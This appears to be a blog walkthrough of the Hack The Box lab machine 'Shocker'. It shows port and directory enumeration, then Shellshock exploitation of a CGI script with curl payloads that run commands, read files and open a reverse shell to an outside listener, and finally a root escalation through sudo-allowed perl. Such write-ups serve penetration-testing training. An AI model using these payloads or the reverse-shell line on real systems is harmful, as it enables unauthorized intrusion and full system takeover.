Open in app

Sign in

Write

Sign in

Shocker HTB

Penthos
2 min readJul 2, 2021

Nmap

PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Running dirb tool
dirb http://10.10.10.56/  http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)                                                                  
http://10.10.10.56/index.html (CODE:200|SIZE:137)

Noting the name of the box, I can tell this is going to be a shellshock vulnerability with the cgi-bin directory its a given!

  • /cgi-bin/
gobuster dir -u http://10.10.10.56/cgi-bin/ -w  /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt    -t 30 -x .txt,.html,.php,.bk,.gz,.png,.sh -s 403,200/user.sh              (Status: 200) [Size: 118]

ShellShock

  • Basic usage (Exploit)

ExploitDB paper: https://www.exploit-db.com/docs/48112

curl http://10.10.10.56/cgi-bin/user.sh -A "() { :;}; echo 'Content-Type: text/plain';echo; /bin/ls"user.sh
  • Let's get the user of the box in /home
curl http://10.10.10.56/cgi-bin/user.sh -A "() { :;}; echo 'Content-Type: text/plain';echo; /bin/ls /home"shelly

We can get the user flag now then work on getting on the box properly via a reverse shell

curl -v http://10.10.10.56/cgi-bin/user.sh -A "() { :;}; echo 'Content-Type: text/plain';echo; /bin/cat /home/shelly/user.txt"
  • Flag
beb558c0c6{REDACTED}a1ce663157

Reverse Shell

curl -v http://10.10.10.56/cgi-bin/user.sh -A "() { :;}; echo 'Content-Type: text/plain';echo; /bin/sh -i >& /dev/tcp/10.10.14.184/9999 0>&1"stty raw -echo;fg
reset
xterm
export TERM=xterm
export SHELL=bash
  • Looking around the system you quickly find sudo -l has a good escalation route
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

Root

  • GTFOBins
sudo perl -e 'exec "/bin/sh";'
  • Now we are root and can get the last flag.txt in /root
  • Flag
f011efb96{REDACTED}a7f7284ceea
Hackthebox
Hackthebox Walkthrough
Hacking
Pentesting
Walkthrough

--

--

Penthos

Written by Penthos

186 Followers

The Cyber War God

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams